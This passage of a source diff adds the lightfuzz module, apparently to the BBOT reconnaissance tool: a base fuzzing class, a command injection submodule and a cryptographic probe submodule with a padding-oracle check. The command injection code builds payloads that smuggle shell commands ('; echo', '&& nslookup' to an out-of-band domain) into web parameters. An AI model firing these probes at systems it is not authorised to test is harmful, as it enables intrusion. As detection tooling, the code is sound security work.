details["event"].data["url"], + "description": f"OS Command Injection (OOB Interaction) Type: [{details['type']}] Parameter Name: [{details['name']}] Probe: [{details['probe']}]", + }, + "VULNERABILITY", + details["event"], + ) + else: + # this is likely caused by something trying to resolve the base domain first and can be ignored + self.debug("skipping result because subdomain tag was missing") + + def _outgoing_dedup_hash(self, event): + return hash( + ( + "lightfuzz", + str(event.host), + event.data["url"], + event.data["description"], + event.data.get("type", ""), + event.data.get("name", ""), + ) + ) + + def url_unparse(self, param_type, parsed_url): + """ + Reconstructs a URL from its components, optionally omitting the query string for GET parameters. + + Parameters: + - param_type (str): The type of parameter, typically "GETPARAM" or another type indicating the request method. + - parsed_url (ParseResult): A named tuple containing the components of the URL (scheme, netloc, path, params, query, fragment). 
+ + Returns: + - str: The reconstructed URL as a string. + + The method checks if the parameter type is "GETPARAM". If so, it omits the query string from the reconstructed URL unless + the retain_querystring flag is set to True. For other parameter types, it includes the query string. + """ + if param_type == "GETPARAM": + querystring = "" + else: + querystring = parsed_url.query + return urlunparse( + ( + parsed_url.scheme, + parsed_url.netloc, + parsed_url.path, + "", + querystring if self.retain_querystring else "", + "", + ) + ) + + async def run_submodule(self, submodule, event): + submodule_instance = submodule(self, event) + await submodule_instance.fuzz() + if len(submodule_instance.results) > 0: + for r in submodule_instance.results: + event_data = {"host": str(event.host), "url": event.data["url"], "description": r["description"]} + + envelopes = getattr(event, "envelopes", None) + envelope_summary = getattr(envelopes, "summary", None) + if envelope_summary: + # Append the envelope summary to the description + event_data["description"] += f" Envelopes: [{envelope_summary}]" + + if r["type"] == "VULNERABILITY": + event_data["severity"] = r["severity"] + await self.emit_event( + event_data, + r["type"], + event, + ) + + async def handle_event(self, event): + if event.type == "URL": + if self.config.get("force_common_headers", False) is False: + return False + + # If force_common_headers is True, we force the emission of a WEB_PARAMETER for each of the common headers to force fuzzing against them + for h in self.common_headers: + description = f"Speculative (Forced) Header [{h}]" + data = { + "host": str(event.host), + "type": "HEADER", + "name": h, + "original_value": None, + "url": event.data, + "description": description, + } + await self.emit_event(data, "WEB_PARAMETER", event) + + elif event.type == "WEB_PARAMETER": + # check connectivity to url + connectivity_test = await self.helpers.request(event.data["url"], timeout=10) + + if connectivity_test: + for submodule_name, submodule in self.submodules.items(): + self.debug(f"Starting {submodule_name} fuzz()") + await self.run_submodule(submodule, event) + else: + self.debug(f"WEB_PARAMETER URL {event.data['url']} failed connectivity test, aborting") + + async def cleanup(self): + if self.interactsh_instance: + try: + await self.interactsh_instance.deregister() + self.debug( + f"successfully deregistered interactsh session with correlation_id {self.interactsh_instance.correlation_id}" + ) + except InteractshError as e: + self.warning(f"Interactsh failure: {e}") + + async def finish(self): + if self.interactsh_instance: + await self.helpers.sleep(5) + try: + for r in await self.interactsh_instance.poll(): + await self.interactsh_callback(r) + except InteractshError as e: + self.debug(f"Error in interact.sh: {e}") + + # If we've disabled fuzzing POST parameters, back out of POSTPARAM WEB_PARAMETER events as quickly as possible + async def filter_event(self, event): + if event.type == "WEB_PARAMETER" and self.disable_post and event.data["type"] == "POSTPARAM": + return False, "POST parameter disabled in lightfuzz module" + return True diff --git a/bbot/modules/lightfuzz/submodules/__init__.py b/bbot/modules/lightfuzz/submodules/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/bbot/modules/lightfuzz/submodules/base.py b/bbot/modules/lightfuzz/submodules/base.py new file mode 100644 index 0000000000..430fa1ff4e --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/base.py @@ -0,0 +1,312 @@ +import copy +import 
base64
+import binascii
+from urllib.parse import quote
+
+
+class BaseLightfuzz:
+    friendly_name = ""
+    uses_interactsh = False
+
+    def __init__(self, lightfuzz, event):
+        self.lightfuzz = lightfuzz
+        self.event = event
+        self.results = []
+        self.parameter_name = self.event.data["name"]
+
+    @staticmethod
+    def is_hex(s):
+        try:
+            bytes.fromhex(s)
+            return True
+        except ValueError:
+            return False
+
+    @staticmethod
+    def is_base64(s):
+        try:
+            if base64.b64encode(base64.b64decode(s)).decode() == s:
+                return True
+        except (binascii.Error, UnicodeDecodeError):
+            return False
+        return False
+
+    # A WEB_PARAMETER event may contain additional_params (e.g. other parameters in the same form or query string). These will be sent unchanged along with the probe.
+    def additional_params_process(self, additional_params, additional_params_populate_empty):
+        """
+        Processes additional parameters by populating blank or empty values with random strings if specified.
+
+        Parameters:
+        - additional_params (dict): A dictionary of additional parameters to process.
+        - additional_params_populate_empty (bool): If True, populates blank or empty parameter values with random numeric strings.
+
+        Returns:
+        - dict: A dictionary with processed additional parameters, where blank or empty values are replaced with random strings if specified.
+
+        The function iterates over the provided additional parameters and replaces any blank or empty values with a random numeric string
+        of length 10, if the flag is set to True. Otherwise, it returns the parameters unchanged.
+        """
+        if not additional_params or not additional_params_populate_empty:
+            return additional_params
+
+        return {
+            k: self.lightfuzz.helpers.rand_string(10, numeric_only=True) if v in ("", None) else v
+            for k, v in additional_params.items()
+        }
+
+    def conditional_urlencode(self, probe, event_type, skip_urlencoding=False):
+        """Conditionally url-encodes the probe if the event type requires it and encoding is not skipped by the submodule.
+        We also don't encode if any envelopes are present.
+        """
+        if event_type in ["GETPARAM", "COOKIE"] and not skip_urlencoding and not getattr(self.event, "envelopes", None):
+            # Exclude '&' from being encoded since we are operating on full query strings
+            return quote(probe, safe="&")
+        return probe
+
+    def build_query_string(self, probe, parameter_name, additional_params=None):
+        """Constructs a URL with query parameters from the given probe and additional parameters."""
+        url = f"{self.event.data['url']}?{parameter_name}={probe}"
+        if additional_params:
+            url = self.lightfuzz.helpers.add_get_params(url, additional_params, encode=False).geturl()
+        return url
+
+    def prepare_request(
+        self,
+        event_type,
+        probe,
+        cookies,
+        additional_params=None,
+        speculative_mode="GETPARAM",
+        parameter_name_suffix="",
+        additional_params_populate_empty=False,
+        skip_urlencoding=False,
+    ):
+        """
+        Prepares the request parameters by processing the probe and constructing the request based on the event type.
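#
# For reference, the conditional_urlencode behavior above leans on quote()'s
# "safe" parameter: '&' is left alone so multi-parameter query strings stay
# intact, while other special characters are percent-encoded (standalone
# example):
from urllib.parse import quote

probe = "a'b&c=d e"
assert quote(probe, safe="&") == "a%27b&c%3Dd%20e"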
+ """ + + if parameter_name_suffix: + parameter_name = f"{self.parameter_name}{parameter_name_suffix}" + else: + parameter_name = self.parameter_name + additional_params = self.additional_params_process(additional_params, additional_params_populate_empty) + + # Transparently pack the probe value into the envelopes, if present + probe = self.outgoing_probe_value(probe) + + # URL Encode the probe if the event type is GETPARAM or COOKIE, if there are no envelopes, and the submodule did not opt-out with skip_urlencoding + probe = self.conditional_urlencode(probe, event_type, skip_urlencoding) + + if event_type == "SPECULATIVE": + event_type = speculative_mode + + # Construct request parameters based on the event type + if event_type == "GETPARAM": + url = self.build_query_string(probe, parameter_name, additional_params) + return {"method": "GET", "cookies": cookies, "url": url} + elif event_type == "COOKIE": + cookies_probe = {parameter_name: probe} + return {"method": "GET", "cookies": {**cookies, **cookies_probe}, "url": self.event.data["url"]} + elif event_type == "HEADER": + headers = {parameter_name: probe} + return {"method": "GET", "headers": headers, "cookies": cookies, "url": self.event.data["url"]} + elif event_type in ["POSTPARAM", "BODYJSON"]: + # Prepare data for POSTPARAM and BODYJSON event types + data = {parameter_name: probe} + if additional_params: + data.update(additional_params) + if event_type == "BODYJSON": + return {"method": "POST", "json": data, "cookies": cookies, "url": self.event.data["url"]} + else: + return {"method": "POST", "data": data, "cookies": cookies, "url": self.event.data["url"]} + + def compare_baseline( + self, + event_type, + probe, + cookies, + additional_params_populate_empty=False, + speculative_mode="GETPARAM", + skip_urlencoding=False, + parameter_name_suffix="", + parameter_name_suffix_additional_params="", + ): + """ + Compares the baseline using prepared request parameters. + """ + additional_params = copy.deepcopy(self.event.data.get("additional_params", {})) + + if additional_params and parameter_name_suffix_additional_params: + # Add suffix to each key in additional_params + additional_params = { + f"{k}{parameter_name_suffix_additional_params}": v for k, v in additional_params.items() + } + + request_params = self.prepare_request( + event_type, + probe, + cookies, + additional_params, + speculative_mode, + parameter_name_suffix, + additional_params_populate_empty, + skip_urlencoding, + ) + request_params.update({"include_cache_buster": False}) + return self.lightfuzz.helpers.http_compare(**request_params) + + async def baseline_probe(self, cookies): + """ + Executes a baseline probe to establish a baseline for comparison. 
+ """ + if self.event.data.get("eventtype") in ["POSTPARAM", "BODYJSON"]: + method = "POST" + else: + method = "GET" + + return await self.lightfuzz.helpers.request( + method=method, + cookies=cookies, + url=self.event.data.get("url"), + allow_redirects=False, + retries=1, + timeout=10, + ) + + async def compare_probe( + self, + http_compare, + event_type, + probe, + cookies, + additional_params_populate_empty=False, + additional_params_override={}, + speculative_mode="GETPARAM", + skip_urlencoding=False, + parameter_name_suffix="", + parameter_name_suffix_additional_params="", + ): + # Deep copy to avoid modifying original additional_params + additional_params = copy.deepcopy(self.event.data.get("additional_params", {})) + + # Override additional parameters if provided + additional_params.update(additional_params_override) + + if additional_params and parameter_name_suffix_additional_params: + # Add suffix to each key in additional_params + additional_params = { + f"{k}{parameter_name_suffix_additional_params}": v for k, v in additional_params.items() + } + + # Prepare request parameters + request_params = self.prepare_request( + event_type, + probe, + cookies, + additional_params, + speculative_mode, + parameter_name_suffix, + additional_params_populate_empty, + skip_urlencoding, + ) + # Perform the comparison using the constructed request parameters + url = request_params.pop("url") + return await http_compare.compare(url, **request_params) + + async def standard_probe( + self, + event_type, + cookies, + probe, + timeout=10, + additional_params_populate_empty=False, + speculative_mode="GETPARAM", + allow_redirects=False, + skip_urlencoding=False, + ): + request_params = self.prepare_request( + event_type, + probe, + cookies, + self.event.data.get("additional_params"), + speculative_mode, + "", + additional_params_populate_empty, + skip_urlencoding, + ) + request_params.update({"allow_redirects": allow_redirects, "retries": 0, "timeout": timeout}) + self.debug(f"standard_probe requested URL: [{request_params['url']}]") + return await self.lightfuzz.helpers.request(**request_params) + + def metadata(self): + metadata_string = f"Parameter: [{self.event.data['name']}] Parameter Type: [{self.event.data['type']}]" + if self.event.data["original_value"] != "" and self.event.data["original_value"] is not None: + metadata_string += ( + f" Original Value: [{self.lightfuzz.helpers.truncate_string(self.event.data['original_value'], 200)}]" + ) + return metadata_string + + def incoming_probe_value(self, populate_empty=True): + """ + Transparently modifies the incoming probe value (the original value of the WEB_PARAMETER), given any envelopes that may have been identified, so that fuzzing within the envelopes can occur. + """ + envelopes = getattr(self.event, "envelopes", None) + probe_value = "" + if envelopes is not None: + probe_value = envelopes.get_subparam() + self.debug(f"incoming_probe_value (after unpacking): {probe_value} with envelopes [{envelopes}]") + if not probe_value: + if populate_empty is True: + probe_value = self.lightfuzz.helpers.rand_string(10, numeric_only=True) + else: + probe_value = "" + probe_value = str(probe_value) + return probe_value + + def outgoing_probe_value(self, outgoing_probe_value): + """ + Transparently modifies the outgoing probe value (fuzz probe being sent to the target), given any envelopes that may have been identified, so that fuzzing within the envelopes can occur. 
+ """ + self.debug(f"outgoing_probe_value (before packing): {outgoing_probe_value} / {self.event}") + envelopes = getattr(self.event, "envelopes", None) + if envelopes is not None: + envelopes.set_subparam(value=outgoing_probe_value) + outgoing_probe_value = envelopes.pack() + self.debug( + f"outgoing_probe_value (after packing): {outgoing_probe_value} with envelopes [{envelopes}] / {self.event}" + ) + return outgoing_probe_value + + def get_submodule_name(self): + """Extracts the submodule name from the class name.""" + return self.__class__.__name__.replace("Lightfuzz", "").lower() + + def log(self, level, message, *args, **kwargs): + submodule_name = self.get_submodule_name() + prefixed_message = f"[{submodule_name}] {message}" + log_method = getattr(self.lightfuzz, level) + log_method(prefixed_message, *args, **kwargs) + + def debug(self, message, *args, **kwargs): + self.log("debug", message, *args, **kwargs) + + def verbose(self, message, *args, **kwargs): + self.log("verbose", message, *args, **kwargs) + + def info(self, message, *args, **kwargs): + self.log("info", message, *args, **kwargs) + + def hugeinfo(self, message, *args, **kwargs): + self.log("hugeinfo", message, *args, **kwargs) + + def warning(self, message, *args, **kwargs): + self.log("warning", message, *args, **kwargs) + + def hugewarning(self, message, *args, **kwargs): + self.log("hugewarning", message, *args, **kwargs) + + def error(self, message, *args, **kwargs): + self.log("error", message, *args, **kwargs) + + def critical(self, message, *args, **kwargs): + self.log("critical", message, *args, **kwargs) diff --git a/bbot/modules/lightfuzz/submodules/cmdi.py b/bbot/modules/lightfuzz/submodules/cmdi.py new file mode 100644 index 0000000000..3a9751b9e3 --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/cmdi.py @@ -0,0 +1,91 @@ +from bbot.errors import HttpCompareError +from .base import BaseLightfuzz + +import urllib.parse + + +class cmdi(BaseLightfuzz): + friendly_name = "Command Injection" + uses_interactsh = True + + async def fuzz(self): + cookies = self.event.data.get( + "assigned_cookies", {} + ) # Retrieve assigned cookies from WEB_PARAMETER event data, if present + probe_value = self.incoming_probe_value() + + canary = self.lightfuzz.helpers.rand_string(10, numeric_only=True) + http_compare = self.compare_baseline( + self.event.data["type"], probe_value, cookies + ) # Initialize the http_compare object and establish a baseline HTTP response + + cmdi_probe_strings = [ + "AAAA", # False positive probe + ";", + "&&", + "||", + "&", + "|", + ] + + positive_detections = [] + for p in cmdi_probe_strings: + try: + # add "echo" to the cmdi probe value to construct the command to be executed + echo_probe = f"{probe_value}{p} echo {canary} {p}" + # we have to handle our own URL-encoding here, because our payloads include the & character + if self.event.data["type"] == "GETPARAM": + echo_probe = urllib.parse.quote(echo_probe.encode(), safe="") + + # send cmdi probe and compare with baseline response + cmdi_probe = await self.compare_probe( + http_compare, self.event.data["type"], echo_probe, cookies, skip_urlencoding=True + ) + + # ensure we received an HTTP response + if cmdi_probe[3]: + # check if the canary is in the response and the word "echo" is NOT in the response text, ruling out mere reflection of the entire probe value without execution + if canary in cmdi_probe[3].text and "echo" not in cmdi_probe[3].text: + self.debug(f"canary [{canary}] found in response when sending probe [{p}]") + if p == "AAAA": # 
Handle detection false positive probe
+                        self.warning(
+                            f"False Positive Probe appears to have been triggered for {self.event.data['url']}, aborting remaining detection"
+                        )
+                        return
+                    positive_detections.append(p)  # Add detected probes to positive detections
+            except HttpCompareError as e:
+                self.debug(e)
+                continue
+        if len(positive_detections) > 0:
+            self.results.append(
+                {
+                    "type": "FINDING",
+                    "description": f"POSSIBLE OS Command Injection. {self.metadata()} Detection Method: [echo canary] CMD Probe Delimiters: [{' '.join(positive_detections)}]",
+                }
+            )
+
+        # Blind OS Command Injection
+        if self.lightfuzz.interactsh_instance:
+            self.lightfuzz.event_dict[self.event.data["url"]] = self.event  # Store the event associated with the URL
+            for p in cmdi_probe_strings:
+                # generate a random subdomain tag and associate it with the event, type, name, and probe
+                subdomain_tag = self.lightfuzz.helpers.rand_string(4, digits=False)
+                self.lightfuzz.interactsh_subdomain_tags[subdomain_tag] = {
+                    "event": self.event,
+                    "type": self.event.data["type"],
+                    "name": self.event.data["name"],
+                    "probe": p,
+                }
+                # the payload is an nslookup command targeting the interactsh domain, prepended with the previously generated subdomain tag
+                interactsh_probe = f"{p} nslookup {subdomain_tag}.{self.lightfuzz.interactsh_domain} {p}"
+                # we have to handle our own URL-encoding here, because our payloads include the & character
+                if self.event.data["type"] == "GETPARAM":
+                    interactsh_probe = urllib.parse.quote(interactsh_probe.encode(), safe="")
+                # we send the probe here, and any positive detections are processed in the interactsh_callback defined in lightfuzz.py
+                await self.standard_probe(
+                    self.event.data["type"],
+                    cookies,
+                    f"{probe_value}{interactsh_probe}",
+                    timeout=15,
+                    skip_urlencoding=True,
+                )
diff --git a/bbot/modules/lightfuzz/submodules/crypto.py b/bbot/modules/lightfuzz/submodules/crypto.py
new file mode 100644
index 0000000000..67fed302f9
--- /dev/null
+++ b/bbot/modules/lightfuzz/submodules/crypto.py
@@ -0,0 +1,457 @@
+import base64
+import hashlib
+from .base import BaseLightfuzz
+from bbot.errors import HttpCompareError
+from urllib.parse import unquote, quote
+
+
+# Global cache for compiled YARA rules
+_compiled_rules_cache = None
+
+
+class crypto(BaseLightfuzz):
+    """
+    Although we have an envelope system to detect hex- and base64-encoded parameter values, those are only assigned when they decode to a valid string.
+    Since crypto values (and serialized objects) will not decode properly, we need a separate, more permissive check here to determine how to process them.
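#
# The echo-canary technique above reduces to two checks: the canary must appear
# in the response, and the literal word "echo" must not (plain reflection of
# the whole probe would include "echo" as well). A self-contained sketch:
def build_probe(value: str, delim: str, canary: str) -> str:
    return f"{value}{delim} echo {canary} {delim}"


def looks_executed(response_text: str, canary: str) -> bool:
    return canary in response_text and "echo" not in response_text


canary = "9402859302"
probe = build_probe("1234", ";", canary)
assert looks_executed(f"result: {canary}", canary)  # command output, likely executed
assert not looks_executed(f"you searched for: {probe}", canary)  # mere reflection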
+ """ + + friendly_name = "Cryptography Probe" + + @staticmethod + def is_hex(s): + try: + bytes.fromhex(s) + return True + except ValueError: + return False + + @staticmethod + def is_base64(s): + try: + if base64.b64encode(base64.b64decode(s)).decode() == s: + return True + except Exception: + return False + return False + + # A list of YARA rules for detecting cryptographic error messages + crypto_error_strings = [ + "invalid mac", + "padding is invalid", + "bad data", + "length of the data to decrypt is invalid", + "specify a valid key size", + "invalid algorithm specified", + "object already exists", + "key does not exist", + "the parameter is incorrect", + "cryptography exception", + "access denied", + "unknown error", + "invalid provider type", + "no valid cert found", + "cannot find the original signer", + "signature description could not be created", + "crypto operation failed", + "OpenSSL Error", + ] + + @property + def compiled_rules(self): + """ + We need to cache the compiled YARA rule globally since lightfuzz submodules are recreated for every handle_event + """ + global _compiled_rules_cache + if _compiled_rules_cache is None: + _compiled_rules_cache = self.lightfuzz.helpers.yara.compile_strings(self.crypto_error_strings, nocase=True) + return _compiled_rules_cache + + @staticmethod + def format_agnostic_decode(input_string, urldecode=False): + """ + Decodes a string from either hex or base64 (without knowing which first), and optionally URL-decoding it first. + + Parameters: + - input_string (str): The string to decode. + - urldecode (bool): If True, URL-decodes the input first. + + Returns: + - tuple: (decoded data, encoding type: 'hex', 'base64', or 'unknown'). + """ + encoding = "unknown" + if urldecode: + input_string = unquote(input_string) + if BaseLightfuzz.is_hex(input_string): + data = bytes.fromhex(input_string) + encoding = "hex" + elif BaseLightfuzz.is_base64(input_string): + data = base64.b64decode(input_string) + encoding = "base64" + else: + data = str + return data, encoding + + @staticmethod + def format_agnostic_encode(data, encoding, urlencode=False): + """ + Encodes data into hex or base64, with optional URL-encoding. + + Parameters: + - data (bytes): The data to encode. + - encoding (str): The encoding type ('hex' or 'base64'). + - urlencode (bool): If True, URL-encodes the result. + + Returns: + - str: The encoded data as a string. + + Raises: + - ValueError: If an unsupported encoding type is specified. + """ + if encoding == "hex": + encoded_data = data.hex() + elif encoding == "base64": + encoded_data = base64.b64encode(data).decode("utf-8") # base64 encoding returns bytes, decode to string + else: + raise ValueError("Unsupported encoding type specified") + if urlencode: + return quote(encoded_data) + return encoded_data + + @staticmethod + def modify_string(input_string, action="truncate", position=None, extension_length=1): + """ + Modifies a cryptographic string by either truncating it, mutating a byte at a specified position, or extending it with null bytes. + + Parameters: + - input_string (str): The string to modify. + - action (str): The action to perform ('truncate', 'mutate', 'extend'). + - position (int): The position to mutate (only used if action is 'mutate'). + - extension_length (int): The number of null bytes to add if action is 'extend'. + + Returns: + - str: The modified string. 
+ """ + if not isinstance(input_string, str): + input_string = str(input_string) + + data, encoding = crypto.format_agnostic_decode(input_string) + if encoding != "base64" and encoding != "hex": + raise ValueError("Input must be either hex or base64 encoded") + + if action == "truncate": + modified_data = data[:-1] # Remove the last byte + elif action == "mutate": + if not position: + position = len(data) // 2 + if position < 0 or position >= len(data): + raise ValueError("Position out of range") + byte_list = list(data) + byte_list[position] = (byte_list[position] + 1) % 256 + modified_data = bytes(byte_list) + elif action == "extend": + modified_data = data + (b"\x00" * extension_length) + elif action == "flip": + if not position: + position = len(data) // 2 + if position < 0 or position >= len(data): + raise ValueError("Position out of range") + byte_list = list(data) + byte_list[position] ^= 0xFF # Flip all bits in the byte at the specified position + modified_data = bytes(byte_list) + else: + raise ValueError("Unsupported action") + return crypto.format_agnostic_encode(modified_data, encoding) + + # Check if the entropy of the data is greater than the threshold, indicating it is likely encrypted + def is_likely_encrypted(self, data, threshold=4.5): + entropy = self.lightfuzz.helpers.calculate_entropy(data) + return entropy >= threshold + + # Perform basic cryptanalysis on the input string, attempting to determine if it is likely encrypted and if it is a block cipher + def cryptanalysis(self, input_string): + likely_crypto = False + possible_block_cipher = False + data, encoding = self.format_agnostic_decode(input_string) + likely_crypto = self.is_likely_encrypted(data) + data_length = len(data) + if data_length % 8 == 0: + possible_block_cipher = True + return likely_crypto, possible_block_cipher + + # Determine possible block sizes for a given ciphertext length + @staticmethod + def possible_block_sizes(ciphertext_length): + potential_block_sizes = [8, 16] + possible_sizes = [] + for block_size in potential_block_sizes: + num_blocks = ciphertext_length // block_size + if ciphertext_length % block_size == 0 and num_blocks >= 2: + possible_sizes.append(block_size) + return possible_sizes + + async def padding_oracle_execute(self, original_data, encoding, block_size, cookies, possible_first_byte=True): + """ + Execute the padding oracle attack for a given block size. + The goal here is not actual exploitation (arbitrary encryption or decryption), but rather to definitively confirm whether padding oracle vulnerability exists and is exploitable. + + Parameters: + - original_data (bytes): The original ciphertext data. + - encoding (str): The encoding type ('hex' or 'base64'). + - block_size (int): The block size to use for the padding oracle attack. + - cookies (dict): Cookies to include, if any + - possible_first_byte (bool): If True, use the first byte as the baseline byte. + + Returns: + - bool: True if the padding oracle attack is successful. + """ + ivblock = b"\x00" * block_size # initialize the IV block with null bytes + paddingblock = b"\x00" * block_size # initialize the padding block with null bytes + datablock = original_data[-block_size:] # extract the last block of the original data + + # This handling the 1/255 chance that the first byte is correct padding which would cause a false negative. 
+        if possible_first_byte:
+            baseline_byte = b"\xff"  # set the baseline byte to 0xff
+            starting_pos = 0  # set the starting position to 0
+        else:
+            baseline_byte = b"\x00"  # set the baseline byte to 0x00
+            starting_pos = 1  # set the starting position to 1
+        # first, obtain a baseline response using the baseline byte
+        baseline = self.compare_baseline(
+            self.event.data["type"],
+            self.format_agnostic_encode(ivblock + paddingblock[:-1] + baseline_byte + datablock, encoding),
+            cookies,
+        )
+        differ_count = 0
+        # for each possible byte value, send a probe and check if the response is different
+        for i in range(starting_pos, starting_pos + 254):
+            byte = bytes([i])
+            oracle_probe = await self.compare_probe(
+                baseline,
+                self.event.data["type"],
+                self.format_agnostic_encode(ivblock + paddingblock[:-1] + byte + datablock, encoding),
+                cookies,
+            )
+            # oracle_probe[0] will be false if the response is different - oracle_probe[1] stores what aspect of the response is different (headers, body, code)
+            if oracle_probe[0] is False and "body" in oracle_probe[1]:
+                differ_count += 1
+
+                if i == 2:
+                    if possible_first_byte is True:
+                        # That's two results which appear "different". Since this is the first run, it's entirely possible \x00 was the correct padding.
+                        # We will break from this loop and redo it with the last byte as the baseline instead of the first
+                        return None
+                    else:
+                        # Now that we have tried the run twice, we know it can't be because the first byte was the correct padding, and we know it is not vulnerable
+                        return False
+        # A padding oracle vulnerability will produce exactly one different response, and no more, so this is likely a real padding oracle
+        if differ_count == 1:
+            return True
+        return False
+
+    async def padding_oracle(self, probe_value, cookies):
+        data, encoding = self.format_agnostic_decode(probe_value)
+        possible_block_sizes = self.possible_block_sizes(
+            len(data)
+        )  # determine possible block sizes for the ciphertext
+
+        for block_size in possible_block_sizes:
+            padding_oracle_result = await self.padding_oracle_execute(data, encoding, block_size, cookies)
+            # if we get a negative result first, there's a 1/255 chance it's a false negative. To rule that out, we must retry with possible_first_byte set to False
+            if padding_oracle_result is None:
+                self.debug("still could be in a possible_first_byte situation - retrying with different first byte")
+                padding_oracle_result = await self.padding_oracle_execute(
+                    data, encoding, block_size, cookies, possible_first_byte=False
+                )
+
+            if padding_oracle_result is True:
+                context = f"Lightfuzz Cryptographic Probe Submodule detected a probable padding oracle vulnerability after manipulating parameter: [{self.event.data['name']}]"
+                self.results.append(
+                    {
+                        "type": "VULNERABILITY",
+                        "severity": "HIGH",
+                        "description": f"Padding Oracle Vulnerability. Block size: [{str(block_size)}] {self.metadata()}",
+                        "context": context,
+                    }
+                )
+
+    async def error_string_search(self, text_dict, baseline_text):
+        """
+        Search for cryptographic error strings using YARA rules in the provided text dictionary and baseline text.
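#
# The decision rule implemented above, distilled: walk every candidate value
# for the byte controlling the final padding byte; a true padding oracle yields
# exactly one response that differs from the rest. Simulated sketch (no HTTP):
def count_differing(responses):
    baseline = responses[0]
    return sum(1 for r in responses[1:] if r != baseline)


vulnerable = ["padding error"] * 255
vulnerable[41] = "different page"  # exactly one probe hit valid padding
assert count_differing(vulnerable) == 1  # oracle indicated

assert count_differing(["padding error"] * 255) == 0  # stable target, no oracle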
+ """ + matching_techniques = set() + matching_strings = set() + + # Check each manipulation technique + for label, text in text_dict.items(): + matches = await self.lightfuzz.helpers.yara.match(self.compiled_rules, text) + if matches: + matching_techniques.add(label) + for matched_string in matches: + matching_strings.add(matched_string) + + # Check for false positives by scanning baseline text + context = f"Lightfuzz Cryptographic Probe Submodule detected a cryptographic error after manipulating parameter: [{self.event.data['name']}]" + if matching_strings: + baseline_matches = await self.lightfuzz.helpers.yara.match(self.compiled_rules, baseline_text) + baseline_strings = set() + for matched_string in baseline_matches: + baseline_strings.add(matched_string) + + # Only report strings that weren't in the baseline + unique_matches = matching_strings - baseline_strings + if unique_matches: + self.results.append( + { + "type": "FINDING", + "description": f"Possible Cryptographic Error. {self.metadata()} Strings: [{','.join(unique_matches)}] Detection Technique(s): [{','.join(matching_techniques)}]", + "context": context, + } + ) + + else: + self.debug( + f"Aborting cryptographic error reporting - baseline_text already contained detected string(s) ({','.join(baseline_strings)})" + ) + + # Identify the hash function based on the length of the hash + @staticmethod + def identify_hash_function(hash_bytes): + hash_length = len(hash_bytes) + hash_functions = { + 16: hashlib.md5, + 20: hashlib.sha1, + 32: hashlib.sha256, + 48: hashlib.sha384, + 64: hashlib.sha512, + } + + if hash_length in hash_functions: + return hash_functions[hash_length] + + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + probe_value = self.incoming_probe_value(populate_empty=False) + + if not probe_value: + self.debug( + f"The Cryptography Probe Submodule requires original value, aborting [{self.event.data['type']}] [{self.event.data['name']}]" + ) + return + + # obtain the baseline probe to compare against + baseline_probe = await self.baseline_probe(cookies) + if not baseline_probe: + self.verbose(f"Couldn't get baseline_probe for url {self.event.data['url']}, aborting") + return + + # perform the manipulation techniques + try: + truncate_probe_value = self.modify_string(probe_value, action="truncate") + mutate_probe_value = self.modify_string(probe_value, action="mutate") + except ValueError as e: + self.debug(f"Encountered error modifying value for parameter [{self.event.data['name']}]: {e} , aborting") + return + + # Basic crypanalysis + likely_crypto, possible_block_cipher = self.cryptanalysis(probe_value) + + # if the value is not likely to be cryptographic, we can skip the rest of the tests + if not likely_crypto: + self.debug("Parameter value does not appear to be cryptographic, aborting tests") + return + + # Cryptographic Response Divergence Test + + http_compare = self.compare_baseline(self.event.data["type"], probe_value, cookies) + try: + arbitrary_probe = await self.compare_probe(http_compare, self.event.data["type"], "AAAAAAA", cookies) # + truncate_probe = await self.compare_probe( + http_compare, self.event.data["type"], truncate_probe_value, cookies + ) # manipulate the value by truncating a byte + mutate_probe = await self.compare_probe( + http_compare, self.event.data["type"], mutate_probe_value, cookies + ) # manipulate the value by mutating a byte in place + except HttpCompareError as e: + self.verbose(f"Encountered HttpCompareError Sending Compare Probe: {e}") + return + 
+ confirmed_techniques = [] + # mutate_probe[0] will be false if the response is different - mutate_probe[1] stores what aspect of the response is different (headers, body, code) + # ensure the difference is in the body and not the headers or code + # if the body is different and not empty, we have confirmed that single-byte mutation affected the response body + if mutate_probe[0] is False and "body" in mutate_probe[1]: + if (http_compare.compare_body(mutate_probe[3].text, arbitrary_probe[3].text) is False) or mutate_probe[ + 3 + ].text == "": + confirmed_techniques.append("Single-byte Mutation") + + # if the body is different and not empty, we have confirmed that byte truncation affected the response body + if truncate_probe[0] is False and "body" in truncate_probe[1]: + if (http_compare.compare_body(truncate_probe[3].text, arbitrary_probe[3].text) is False) or truncate_probe[ + 3 + ].text == "": + confirmed_techniques.append("Data Truncation") + + if confirmed_techniques: + context = f"Lightfuzz Cryptographic Probe Submodule detected a parameter ({self.event.data['name']}) to appears to drive a cryptographic operation" + self.results.append( + { + "type": "FINDING", + "description": f"Probable Cryptographic Parameter. {self.metadata()} Detection Technique(s): [{', '.join(confirmed_techniques)}]", + "context": context, + } + ) + + # Cryptographic Error String Test + # Check if cryptographic error strings are present in the response after performing the manipulation techniques + await self.error_string_search( + {"truncate value": truncate_probe[3].text, "mutate value": mutate_probe[3].text}, baseline_probe.text + ) + # if we have any confirmed techniques, or the word "padding" is in the response, we need to check for a padding oracle + if confirmed_techniques or ( + "padding" in truncate_probe[3].text.lower() or "padding" in mutate_probe[3].text.lower() + ): + # Padding Oracle Test + if possible_block_cipher: + self.debug( + "Attempting padding oracle exploit since it looks like a block cipher and we have confirmed crypto" + ) + await self.padding_oracle(probe_value, cookies) + + # Hash identification / Potential Length extension attack + data, encoding = crypto.format_agnostic_decode(probe_value) + # see if its possible that a given value is a hash, and if so, which one + hash_function = self.identify_hash_function(data) + if hash_function: + hash_instance = hash_function() + # if there are any hash functions which match the length, we check the additional parameters to see if they cause identical changes + # this would indicate they are being used to generate the hash + if ( + hash_function + and "additional_params" in self.event.data.keys() + and self.event.data["additional_params"] + ): + # for each additional parameter, we send a probe and check if it causes the same change in the response as the original probe + for additional_param_name, additional_param_value in self.event.data["additional_params"].items(): + try: + additional_param_probe = await self.compare_probe( + http_compare, + self.event.data["type"], + probe_value, + cookies, + additional_params_override={additional_param_name: additional_param_value + "A"}, + ) + except HttpCompareError as e: + self.verbose(f"Encountered HttpCompareError Sending Compare Probe: {e}") + continue + # the additional parameter affects the potential hash parameter (suggesting its calculated in the hash) + # This is a potential length extension attack + if additional_param_probe[0] is False and (additional_param_probe[1] 